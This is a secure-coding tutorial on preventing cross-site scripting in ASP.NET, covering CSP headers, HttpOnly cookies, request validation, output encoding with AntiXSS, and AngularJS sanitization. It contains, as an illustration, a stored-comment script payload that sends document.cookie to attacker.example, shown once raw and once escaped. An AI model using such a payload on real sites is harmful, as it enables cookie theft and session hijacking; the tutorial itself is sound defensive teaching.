Preventing XSS in ASP.NET Made Easy

“Our web application can trust the motives of its users and the information they provide.”
- No One Ever

Is your web application serving up only static pages, pages that never change and don't accept any user input, implicitly or explicitly?

If yes, we're done here. This article isn't for you.

But what are the chances of that? Probably zero. This is Web x.0, and most likely you're serving up dynamic pages that your visitors interact with: searching for something on your site, logging in, leaving comments, navigating to a specific URL that includes parameters, or any number of other common activities. If that sounds more like your web application, read on.

In 2014, Cross-Site Scripting (XSS) was identified as the most frequently found vulnerability among those tested for in web applications. More concerning, OWASP ranks it #3 in their top 10 web application security flaws by prevalence and business impact. Like trash attracts flies, the ever-evolving user immersion of today's web applications is a playground for vulnerabilities such as XSS. But why is that, and what can we do about preventing XSS in ASP.NET web applications?

Preventing XSS in ASP.NET Made Easy

If you have spent any time attempting to wrap your head around XSS, like many, you might have come away feeling overwhelmed and perplexed. We have made it that way by defining 5 terms for small variations in how the vulnerability can be exploited, and by producing a plethora of information and ways to implement mitigations. In reality, it can be much simpler and more straightforward.

The key to understanding XSS lies in understanding that there are only 2 key players involved. Having a basic understanding of those 2 players and their roles will empower you to identify XSS vulnerabilities in your web application. Furthermore, coupling that information with the tools I provide will help you take a proactive approach to protecting against this type of vulnerability.

Those key players are the browser and external sources. Let's start off by understanding the browser's role.

Execute All the Things!

For you seasoned web developers, the following will be a trivial example. But for the newly indoctrinated, or those making a foray into web development, the following is a very high-level example of the flow of a client requesting a site such as http://example.com.

[Diagram: high-level flow of a browser requesting http://example.com]

I highly recommend reading How Browsers Work for a very technical outline of, you guessed it, how browsers work.

We can take a simple approach and divide all the information the browser receives from the web server into two camps: data and instructions. When the browser is executing a JavaScript script, for example, we can say it is processing that information within an instruction context. Conversely, when the browser is displaying plain text, it is operating within a data context. However, when our web application receives information that we expect to simply be data and it instead contains instructions masquerading as data, the browser will execute those instructions, since, generally speaking, browsers do not have any concept of malicious vs. non-malicious.

The key here is “information our browser receives”. Where does that information come from? Only the developer? Or does it contain information provided by an external source? This leads us to the second key player in understanding XSS.

Note: I said earlier that browsers don't have a concept of malicious vs. non-malicious. However, modern browsers are getting better at providing native mitigations, implementing a number of constraints and rules that help mitigate various vulnerabilities, some of which are categorized as XSS. Unfortunately, these constraints and rules vary from browser to browser, and relying on the protection of one browser might leave you vulnerable in another. They should always be viewed as icing on the cake.

External Source

Whereas the browser's execution of instructions might be the catalyst, the cause of an XSS exploit comes from external sources.

One of the many ingredients that go into a web application providing a rich and immersive user experience is user input. Nearly all cases of XSS vulnerabilities originate from user input, and some would go as far as saying all cases do. As mentioned at the beginning of this article, user input can originate from a number of sources: form inputs, blog post comments and query string parameter values of a URL, to name just a few. In each of these examples the user, an external source, is providing information to our web application that we have the potential to do something with.

Therefore, when it comes to understanding the role of external sources in XSS, we can identify any potential vulnerability within our site wherever we allow user input that has not been properly handled. Before getting to the "proper handling", let's look at an easy example to drive the point home.

The Case of the Curious Comment

The following example outlines how a malicious script can be injected onto a page, how a separate victim, on a separate computer, at a separate location, can be directly affected by it, and what kind of malicious act the script might perform.

Your company's strict licensing and security policy doesn't allow the use of third-party tools, so the new article comments feature they want to make available on the company's website must be developed in-house from the ground up. With the new comment feature available to users, the following scenario is carried out.

[Diagram: the Curious Comment attack flow]

In the example, a malicious user is allowed to embed a <script> HTML tag in their comment, which is ultimately saved to storage by the server. When anyone visits the page that contains the comment, the server serves all HTML, CSS, JavaScript and other resources pertaining to the page to the victim's browser. In turn, the victim's browser renders all the HTML and executes any scripts, including the one embeddedded in the comment that it received from our server.
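
To make the scenario concrete, the stored comment might look something like this when served back verbatim (the payload and URL are hypothetical):

   <div class="comment">
      Great article!
      <script>
         // Attacker-controlled: ship the victim's cookies to a server they own
         new Image().src = 'https://attacker.example/steal?c=' + document.cookie;
      </script>
   </div>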

We can see here that an attacker's user input was injected, persisted, delivered and executed on another user's computer. The outcome can be any number of results, such as the diagrammed theft of the user's cookies, which could allow the attacker to impersonate the victim.

Recap

Based on everything so far, you can summarize that an XSS vulnerability can exist anywhere within our web application that an external source, such as user input, is allowed to supply information to our application, and that information has the potential to carry instructions, such as JavaScript, that could be harmful.

So would disallowing user input be the correct answer to remove this vulnerability? Obviously not. The answer is properly handling user input: treating any externally supplied information as potentially harmful and neutralizing it.

Fix All the Things!

Again, if you have spent any time reading the numerous resources regarding XSS, you have no doubt come across the abundant variations of how this vulnerability can be exploited. However, in all cases, as long as all user input is properly handled and you utilize additional proactive testing methods, you will greatly reduce your chance of being exploited by this type of vulnerability.

Unfortunately, along with the enormity of possible XSS vulnerabilities comes a vast amount of information on how you should secure your web application from being exploited. Therefore, instead of subjecting you to the fire-hose effect, I have formed a template constructed of 3 building blocks that will help you focus your efforts when applying mitigations to your web application. Furthermore, within that template, you can easily swap out or add additional mitigations depending on your application's needs or specific edge cases.


There is a great deal of information in the following sections, but unlike other sources of information on how to handle XSS vulnerabilities, the following can be consumed by focus area and, even more granularly, per recommended mitigation.

In addition, whitelisting and blacklisting are two popular approaches to specifying the security rules (in different contexts) that we want our application to adhere to. In nearly all cases a whitelist approach is the recommended and most maintainable choice. This is the approach you will see used throughout the various recommended mitigations, either as my recommendation or as a mitigation's internal approach.

Application


At the application layer we are looking at deploying mitigations that can have a positive application-wide security impact. These are usually defense-in-depth mitigations that can touch both the client as well as the server.

HTTP Response Headers

There are a number of HTTP headers that we can send back on all responses to limit assumptions made by the browser, control browser loading behavior and mitigate user-specific security changes. Luckily for us, all the headers we will leverage are fully supported by modern browsers. Let's start off by looking at the header that will have the biggest impact for mitigating XSS vulnerabilities: the Content Security Policy.

Content Security Policy (CSP)

The content-security-policy header allows applications to dictate to the browser what sources the browser is permitted to acquire resources from. There is an extensive list of web application resource types that can be controlled: scripts, styles, images, audio and video, form actions and embedded resources, just to name a few.

If we have made anything clear, it is that XSS vulnerabilities allow attackers to potentially load and execute scripts from other sources, such as a script embedded in a crafted URL in an email. The ability to remove that threat by specifying the allowed sources the browser can load resources from significantly narrows the attacker's abilities within our web application.

So, in an example where we want to restrict the loading of script and style resources to only our domain, it is as easy as specifying the script-src and style-src directives and setting their value to 'self':

Content-Security-Policy: script-src 'self'; style-src 'self'

But in the common scenario where we want to load resources from external sources such as CDNs, we only need to add those domains to the whitelist. We can see this in the following example where we want to load the Bootstrap script and style resources from Google's CDN (https://ajax.googleapis.com) while limiting image sources to our domain only with the img-src directive. We are also utilizing the default-src directive to specify that all resources must be loaded over HTTPS:

Content-Security-Policy: default-src https:; script-src 'self' https://ajax.googleapis.com; style-src 'self' https://ajax.googleapis.com; img-src 'self'

Therefore, in the case where a victim has received a well-crafted link from an attacker, the attempt to load an external script would be denied since its source is not included in the whitelist. It might go without saying, but if a trusted source (for example, Google's CDN) were compromised, we in turn would be vulnerable since we trust that source.

Implementing in ASP.NET

In the context of the ASP.NET MVC framework, we can add this content-security-policy header to our responses in a number of ways.

Using an Attribute

   public class ContentSecurityPolicyFilterAttribute : ActionFilterAttribute
   {
      public override void OnActionExecuting(ActionExecutingContext filterContext)
      {
         var response = filterContext.HttpContext.Response;
         response.AddHeader("Content-Security-Policy",
            "default-src https:; " +
            "script-src 'self' https://code.jquery.com https://ajax.aspnetcdn.com; " +
            "style-src 'self' https://ajax.aspnetcdn.com");

         base.OnActionExecuting(filterContext);
      }
   }

Then we can either enforce this globally by registering it as a global filter in the ASP.NET pipeline, or apply it individually to actions or controllers; a minimal registration sketch follows. Obviously, this is a very straightforward example. But it would not be difficult to enforce default behaviors (default-src) on all HTTP responses and layer granular control on top at the controller or action level. Or, alternatively, here is an example of how you could utilize the OWIN modular approach to insert it into the pipeline.
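
For reference, here is a minimal sketch of the global registration, assuming the FilterConfig class from the default ASP.NET MVC project template:

   public class FilterConfig
   {
      public static void RegisterGlobalFilters(GlobalFilterCollection filters)
      {
         // Apply the CSP header to every controller action in the application.
         filters.Add(new ContentSecurityPolicyFilterAttribute());
      }
   }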

Web.config / IIS

If using IIS 7 or above, we have the alternative of adding it via the web.config by specifying custom headers to be included:

   <configuration>
      <system.webServer>
         <httpProtocol>
            <customHeaders>
               <add name="Content-Security-Policy" value="default-src 'self' https://ajax.googleapis.com" />
            </customHeaders>
         </httpProtocol>
      </system.webServer>
   </configuration>

As an alternative to the web.config approach, you can apply custom headers directly in IIS using IIS Manager.

There is an abundance of flexibility and control afforded by the content-security-policy header that can provide security for other areas we have not covered here. For the full details and a breakdown of all of the Content Security Policy directives, see the W3C documentation.

NOTE: Besides the value of "self", be aware of the directive values "unsafe-inline" and "unsafe-eval", which you should absolutely avoid if at all possible. Specifying either as a whitelisted value would remove the security benefit afforded by the CSP.

Reflected-xss

Reflected-xss is actually just another directive of the content-security-policy, like the script-src and style-src directives we saw above. The difference is that it standardizes the older, unstandardized X-XSS-Protection header that a number of browsers didn't support. I included it as its own separate mitigation since it is quite different in its intended goal.

Some browsers offer heuristic filters that help filter out "potentially" unsafe scripts that are reflected back to the client, i.e. user-supplied data containing harmful script that came in on the request and is now being reflected back on the response. When the browser's filter has been turned off by the user, you can still enforce it by utilizing the reflected-xss directive.

If you set this directive's value to "block", the browser will completely pull the plug on loading any resources on the page when it concludes that it has potentially discovered unsafe data in the response. Alternatively, you can filter out the potentially harmful script and allow the site to continue loading trusted resources by using the "filter" value:

Content-Security-Policy: reflected-xss filter

As far as ASP.NET implementation, this directive is added using the same preceding methods as described under Content Security Policy.

NOTE: This directive (and more so the original unstandardized X-XSS-Protection header) has received some legitimate negative feedback due to its ability to interfere with requests/responses where legitimate <script></script> content was part of the request (such as when you want to allow it as part of a search). Proper HTML encoding can neuter such a vulnerability without interference from the filter. So know the limitations of this directive and, when it affects the user experience, opt for other mitigations such as escaping (output encoding) that we'll be looking at shortly.

Cookies

A typical goal of an XSS exploit is to acquire a user's cookies, for a number of reasons that I have gone into extensively in this article/video.

HttpOnly Flag

We have a few levels at which we can apply this mitigation. At a minimum, we can remove the ability for client-side script to reach the cookie by setting the HttpOnly flag on the Set-Cookie header. So, wherever we are setting and passing our application's cookies, we can set the HttpOnly flag to true to accomplish this.

In ASP.NET Web API, it can be as simple as setting the HttpOnly property to true within a CookieHeaderValue object that is then added to the cookies collection on the response header:

   // nvc is a NameValueCollection of the cookie's name/value pairs
   var cookie = new CookieHeaderValue("myapp", nvc)
   {
      // Domain and Path can also be set here
      HttpOnly = true
   };

   var response = new HttpResponseMessage(HttpStatusCode.OK);
   response.Headers.AddCookies(new[] { cookie });
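
Alternatively, for cookies written through System.Web (such as forms authentication or session cookies), the HttpOnly flag can be forced application-wide via the httpCookies element in the web.config. A minimal sketch:

   <configuration>
      <system.web>
         <!-- httpOnlyCookies forces the HttpOnly flag; requireSSL additionally marks cookies Secure -->
         <httpCookies httpOnlyCookies="true" requireSSL="true" />
      </system.web>
   </configuration>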

As you can see, there are quite a few application-wide mitigations we can apply that cross a number of application borders. Let's now turn our attention to mitigations that apply specifically to the server.

Server


At the server layer, we are targeting the ASP.NET framework for specific mitigations; this is where the majority of the steps we take to remove XSS vulnerabilities will generally live.

Request Validation

ASP.NET provides an out-of-the-box feature called Request Validation that automatically validates all incoming HTTP requests. With all the various ASP.NET frameworks and versions available, OWASP provides a quick-glance chart of the specific frameworks and their support for Request Validation.

Request Validation attempts to detect any markup or code in a request, throws a "potentially dangerous value was detected" error and returns a 500 HTTP status code:

[Screenshot: the "potentially dangerous value was detected" error page]
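
For example, a hypothetical request like the following would trip the validator:

   GET /search?q=<script>alert('xss')</script>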

Important! This is a mitigation that should be viewed as a defense-in-depth approach and absolutely not relied on by itself as a be-all end-all solution.

Nothing needs to be done to enable it, as it is active by default. There are cases where you might need to allow valid markup through without it being blocked. This can be accomplished by utilizing the ValidateInput attribute on an ASP.NET controller or action and passing it the value "false":

   [ValidateInput(false)]
   public ActionResult UploadMarkup(string someStr)
   {
      //...
   }

Request Validation can also be completely disabled by following the instructions provided in this MSDN article.

Manual Validation

We just looked at an out-of-the-box feature that ASP.NET provides for validating user input, which can be an extremely helpful mitigation in a defense-in-depth strategy. However, since we are in control of how our application handles user input, limiting the scope of what type of data can be submitted to our APIs provides another checkpoint for input validation by filtering out invalid data.

ASP.NET provides a number of flexible ways to manually validate input that reaches our APIs. However, I want to focus on a couple of simple-to-implement options for providing instant input validation. We can easily add data validation rules to models in ASP.NET MVC and Web API alike using the Data Annotations library. This allows us to be expressive about our expectations for the user input, and most data annotations naturally apply a whitelisting approach.

The tricky part is validating free-form strings. But Data Annotations allow for putting restrictions in place, such as constraining a Social Security Number string using the RegularExpressionAttribute:

   public class PersonModel
   {
      //...FirstName
      //...LastName

      [RegularExpression(@"^(\d{9}|\d{3}-\d{2}-\d{4})$", ErrorMessage = "Please enter a valid Social Security Number")]
      public string Ssn { get; set; }
   }

When we need to control the logic that goes into validating user input, we can derive from the ValidationAttribute class. This allows us to create our own annotations when the need arises, and there are a number of great articles to get you started; a brief sketch follows. However, it is easy to inadvertently fall into a blacklisting approach when using the built-in regular expression data annotation or when creating a custom data annotation. So be careful about how your logic or expression is being applied.
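
As a minimal illustration, here is a sketch of a custom whitelist-style annotation (the attribute name and allowed character set are hypothetical examples):

   using System.ComponentModel.DataAnnotations;
   using System.Linq;

   public class LettersDigitsAndSpacesAttribute : ValidationAttribute
   {
      public override bool IsValid(object value)
      {
         var text = value as string;
         if (string.IsNullOrEmpty(text))
            return true; // leave presence checks to [Required]

         // Whitelist approach: every character must belong to the allowed set.
         return text.All(c => char.IsLetterOrDigit(c) || c == ' ');
      }
   }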

Content-Type and Character Set

To help the browser determine what type of information it has received, we can provide metadata about the information (data) in the form of a MIME type label specified on the content-type header. Therefore, when the browser receives a JavaScript file (text/javascript), HTML (text/html) or a PNG image (image/png), it knows how to process it.

This article is not about MIME types; however, if the correct content-type is not specified, browsers will undergo what is called content (or character set) sniffing to determine the content-type of a resource. When the browser doesn't have a correct content-type or character set (which specifies the encoding), it leaves the door open for external input to trick the browser into interpreting part of the response as HTML, which in turn can lead to an XSS exploit.

Depending on the framework in use, there are a number of ways to specify the content-type and character set. Obviously, this can be important with ASP.NET MVC or Web API for returning various payloads. Therefore, if needed, setting the content type can be done at the individual controller action in Web API by setting the Content property on a response:

   [HttpGet]
   public HttpResponseMessage GetCsv(string fileName)
   {
      var csv = LoadCsv(fileName); // placeholder for your own data access
      var response = Request.CreateResponse(HttpStatusCode.OK);
      response.Content = new StringContent(csv, Encoding.UTF8, "text/csv");
      return response;
   }

Alternatively, this can be accomplished in the pipeline using an OWIN module, such as how the NuGet package Nancy does it.

Data Encoding/Escaping

We have officially reached the mother lode of mitigations for XSS vulnerabilities. This is also where you might find yourself highly confused if you have done any research before now, with the terms “encoding” and “escaping” being applied back and forth, interchangeably, to both HTML and JavaScript. So, let's take a quick moment and define what they actually mean.

It starts by going back to our original key player, the browser. When our web application receives information from an external source that we expect to simply be data and it instead contains instructions masquerading as data, the browser will execute those instructions. So, if the heart of the vulnerability lies in the data being disguised, then having the ability to notify the browser that this data should only be treated as data and nothing else will ensure that instructions can't be executed. This is “escaping” (a.k.a. output encoding) in a nutshell.
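
To make that concrete, here is a before-and-after sketch using the hypothetical comment payload from earlier:

   <!-- Before escaping: the browser sees an instruction and executes it -->
   <script>new Image().src = 'https://attacker.example/steal?c=' + document.cookie;</script>

   <!-- After HTML escaping: the browser sees only data and renders it as text -->
   &lt;script&gt;new Image().src = 'https://attacker.example/steal?c=' + document.cookie;&lt;/script&gt;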

Jeff Williams's description of “escaping” (output encoding) on OWASP is one of the best I have seen of the technique and its role:

“’Escaping’ is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser. There are lots of different types of escaping, sometimes confusingly called output ‘encoding’. Some of these techniques define a special ‘escape’ character and other techniques have a more sophisticated syntax that involves several characters.

Do not confuse output escaping with the notion of Unicode encoding, which involves mapping a Unicode character to a sequence of bits. This level of encoding is automatically decoded and does not defuse attacks. However, if there are misunderstandings about the intended charset between the server and browser, it may cause unintended characters to be communicated, possibly enabling XSS attacks. This is why it is still important to specify the Unicode character encoding (charset), such as UTF-8, for all communications.

Escaping is the primary means to make sure that untrusted data can't be used to convey an injection attack. There is no harm in escaping data properly – it will still render in the browser properly. Escaping simply lets the interpreter know that the data is not intended to be executed and therefore prevents attacks from working.”


Implementation

So, now that we understand that output encoding is the answer for letting the browser know that we want the information it receives to be rendered as data and not instructions, how do we implement it? Well, first off, if you do any research, you will find a vast number of rules regarding questions such as:

  1. Are we working in an HTML context?

  2. What if this is a JavaScript context where we need to encode some data?

  3. Or maybe this is a blended context where we have HTML within JavaScript?

There are so many rules and variations that must be taken into consideration when doing proper encoding that you are highly prone to making a mistake if you attempt to do it manually, and that is never recommended. Therefore, when rendering any output that originated from an external source such as user input, relying on an output encoding library specifically designed to tackle this problem is the answer.

ASP.NET and the AntiXSS Library

ASP.NET makes it very easy to encode output and ensure the browser renders it without the jeopardy of any malicious script being executed, but that was not always the case. To better appreciate what we have with Razor templates, let's see where we have been.

Early versions of ASP.NET did not encode:

   <div><%= model.Address %></div>

Then a helper was introduced that provided the ability to encode output:

   <div><%= Html.Encode(model.Address) %></div>

Then, encoding was incorporated implicitly using new syntax that also ensured you didn't inadvertently double encode:

   <div><%: model.Address %></div>

Finally, Razor does it all in one step, providing output encoding by default:

   <div>@Model.Address</div>

However

There is one inherent problem with ASP.NET's native encoding routines: they generally use a blacklisting approach in their validation. Moreover, there are cases beyond the preceding simple encoding scenarios, such as placing user input in an HTML attribute, or a mixed-context scenario that involves HTML being used within JavaScript. An HTML attribute context is different from a JavaScript or CSS context, and each therefore requires a different encoding approach, as I have said before.

To the rescue comes the .NET AntiXSS library. This library uses a whitelisting approach that has begun to be included in some of ASP.NET's own encoding routines, as seen in the new System.Web.Security.AntiXss namespace. The library provides a number of helper functions for both output encoding and sanitization (which we haven't even talked about yet) that cover HTML, JavaScript, XML, CSS and HTML attributes.
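
For a quick taste, here is a minimal sketch using the System.Web.Security.AntiXss encoder directly (the input value is a hypothetical example):

   using System.Web.Security.AntiXss;

   var comment = "<script>alert('xss')</script>";

   // Encode for an HTML element context; named entities keep the output readable.
   var forHtml = AntiXssEncoder.HtmlEncode(comment, useNamedEntities: true);

   // Encode for a URL context, e.g. a query string value.
   var forUrl = AntiXssEncoder.UrlEncode(comment);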

There are 3 steps to get up and running with the AntiXSS library in your ASP.NET application.

    Step 1: Include in your project

    An easy and quick way to pull in the AntiXSS library is by using the NuGet package, or you can download and include the assemblies directly.


    Step 2: Set AntiXSS library as your default encoding library using the web.config:

    We can take it one step further and incorporate AntiXSS as our default encoding library by updating the encoderType attribute of the httpRuntime element in the web.config. Once set, ASP.NET's built-in encoding (including Razor's implicit output encoding) is routed through the AntiXSS encoder.

   <httpRuntime targetFramework="4.5.1" requestValidationMode="2.0" encoderType="System.Web.Security.AntiXss.AntiXssEncoder" />

    Step 3: (Optional) Utilize the Encoder and Sanitizer

    Outside of utilizing the library as the primary encoding provider, it's not uncommon to need to put user data into contexts that require different encoding syntax. The library provides helper methods for handling cases where we need to inject encoded user input into HTML attributes, CSS, JavaScript and URLs. In other scenarios, we might want to allow user input in the form of HTML; there we can utilize the sanitization functions the library affords to remove any elements of the supplied user input that are not part of the whitelist of safe markup.

   <div data-personal="@Encoder.HtmlAttributeEncode(Model.LastName)"></div>

   <div>@Sanitizer.GetSafeHtmlFragment(Model.PersonalWebsiteUrl)</div>

See the OWASP link for a consolidated list of resources for utilizing the AntiXSS library's helpers, or simply explore the library's open-source repository. Visual Studio's IntelliSense helps too!

Before proceeding, this might be a good time to pause and talk a little more about the concept of sanitizing user input and what it means.

Sanitization

We've mentioned sanitizing user input on a few occasions. Sanitization affords us the ability to retain user input that has been found safe while removing unsafe characters and values. The risk of performing sanitization on user input comes down to how it is being done.

Attempting to manually sanitize data against a home-grown blacklist is a disaster waiting to happen, simply because attackers' creative ways of sneaking data past your sanitization checkpoints are forever changing. Therefore, this is another chance to drive home the importance of leveraging a library whose main purpose is to facilitate proper sanitization. We'll talk more about sanitization when we look at AngularJS's implicit use of it under the Client section.

I Am Persisting This User Input, When Should I Encode It?

A common question I hear is “I am persisting this user input, when should I encode it?” Fair question; it seems logical to conclude that doing it before saving would be expected. However, the general consensus is that it should not be done before persisting to storage, but rather when the data is ready for display in an output context.

Encoding only at output time is what is recommended, so that we can completely eliminate the following scenarios (see the sketch after this list):

  1. Double encoding.

  2. Assumptions that it was already handled properly.

  3. Possible data loss through truncation, because encoded data is larger than the original user input.

  4. Application requirements change; the need to consume the data differently (in a non-encoded state) is a real possibility.

  5. Less prone to errors – see #2.
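
As a minimal sketch of the principle (the model, repository and view are hypothetical):

   // On the way in: validate, then persist the raw comment text un-encoded.
   comment.Body = model.Body;
   repository.Save(comment);

   // On the way out: encode only at display time. In a Razor view,
   // @ already HTML-encodes for an HTML element context:
   //    <div class="comment">@Model.Body</div>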

If there is one take-away from the server-side mitigations, it's to understand the importance of escaping (output encoding) user input, and of leveraging a proper library to ensure it is done correctly based on context. The mitigations outlined here will help fortify the server side of the web stack. Let's now turn our attention to what we can do on the front-end client.

Client


With the ever-growing popularity of JavaScript frameworks (specifically SPAs), the need to be cognizant of the techniques (if any) a framework uses to properly handle output is paramount. Here we'll look at some cases where the client is exposed to specific vulnerabilities you need to be aware of, as well as the security measures used by the popular AngularJS framework.

We have covered much, and what we have covered probably accounts for a vast majority of XSS vulnerabilities. But for some time now, the workload of web applications has been shifting to the front-end of the web stack. Because of this, the possibility of the front-end circumventing measures you have on the back-end is ever more prevalent. With this shift we have seen the increasing use of front-end frameworks. If you haven't taken the time to examine what security measures your front-end framework of choice offers, now would be the time.

Every framework is different, as is the amount of importance each puts on security. To provide an example of what I mean about being cognizant of your front-end framework's security measures, let's look at one of the currently popular JavaScript frameworks.

AngularJS is a popular JavaScript framework that does much out-of-the-box to provide mitigations against XSS attacks. Without any additional work on your part, it will output encode content that it binds into the DOM (for example, via ngBind, ngRepeat and so on):

   <li ng-bind="todo"></li>

However, if you have HTML that you want rendered as HTML and not just as encoded output, Angular makes that possible using the ngBindHtml directive:

   <li ng-bind-html="todo"></li>

However, doing this will get you an error regarding your attempt to render “potentially” unsafe HTML:

Error:
[$sce:unsafe] Attempting to use an unsafe value in a safe context.

As an additional security measure, AngularJS requires that, at a minimum, you provide it a sanitizer, which is done by adding the ngSanitize module as an application dependency:

angular.module('questionnaire', ['ngRoute', 'ngSanitize'])

Then, using a whitelist approach, Angular will sanitize (remove) any potentially harmful markup before rendering the HTML.

However, when you do want to render user input as HTML, Angular provides the Strict Contextual Escaping ($sce) service that allows you to do just that, using a number of helper methods for marking values as trusted in HTML, CSS, JavaScript and URL contexts.

Finally, one last tool provided by Angular is its ngCsp directive, which ties into the Content Security Policy we talked about earlier. It forces Angular to take a more stringent approach to JavaScript evaluation: it will no longer take eval-based shortcuts, which can reduce performance by around 30%.
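
Enabling it is a one-liner on the application's root element (a sketch, assuming the module from the earlier example):

   <html ng-app="questionnaire" ng-csp>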

This isn't an article on Angular security, and I will leave it to other articles to take you through the implementation of the preceding Angular security features. However, as we have seen, the ever-increasing shift of responsibility to the front-end has made way for more and more front-end frameworks to spring up. Therefore, it is paramount to be cognizant of what security features your framework of choice has or lacks.

Tools

WhiteHat Security founder Jeremiah Grossman coined the term “hack yourself first” when talking about going on the cyber offense. The idea is to rattle your own web application's cage to see exactly how weak it is. Because, truth be told, we can do all of the above, but will you have caught all the XSS vulnerabilities within your web application? How would you know? You can't magically know.

That is why it is highly recommended to employ tools such as an XSS scanner. However, this is not an article on how to use an XSS scanner or a promotion of one over another; tools change, lose support, and new ones come out quite regularly. Google has released Firing Range, a free and open-source test bed for XSS scanners, that might be worth checking out. What is important is that you take proactive steps to ensure you have found and mitigated any XSS vulnerabilities within your application.

The Take-Away

When it comes to understanding XSS vulnerabilities, exploits and mitigations, there is much to consider and cover. However, we can make this easier on ourselves if we adhere to the following 6 take-away points:

  1. Understand how the browser and external sources work in tandem as the two key players involved when it comes to understanding XSS.

  2. External sources, and more precisely any form of user input, must be untrusted, assumed malicious and handled properly.

  3. When applying mitigation techniques, leveraging a whitelisting approach is the safest and easiest to maintain. When choosing tools (for example, the AntiXSS library), try to pick ones that also leverage a whitelisting approach.

  4. Use the application, server and client focus areas to help make mitigations more digestible and more consistent in coverage.

  5. Understand the various contexts where data can be encoded, such as JavaScript, CSS, HTML and URL, and utilize an XSS encoding library to apply the appropriate encoding.

  6. Finally, understand the importance of hacking yourself first and utilizing tools such as XSS scanners to check your work.

There is a reason why XSS is one of the most prevalent and costly web application vulnerabilities in the wild: it is easy to discover, easy to exploit and, for software developers, easy to introduce. Therefore, we must remain cognizant that anywhere in our web application user input is accepted, it must be handled properly.
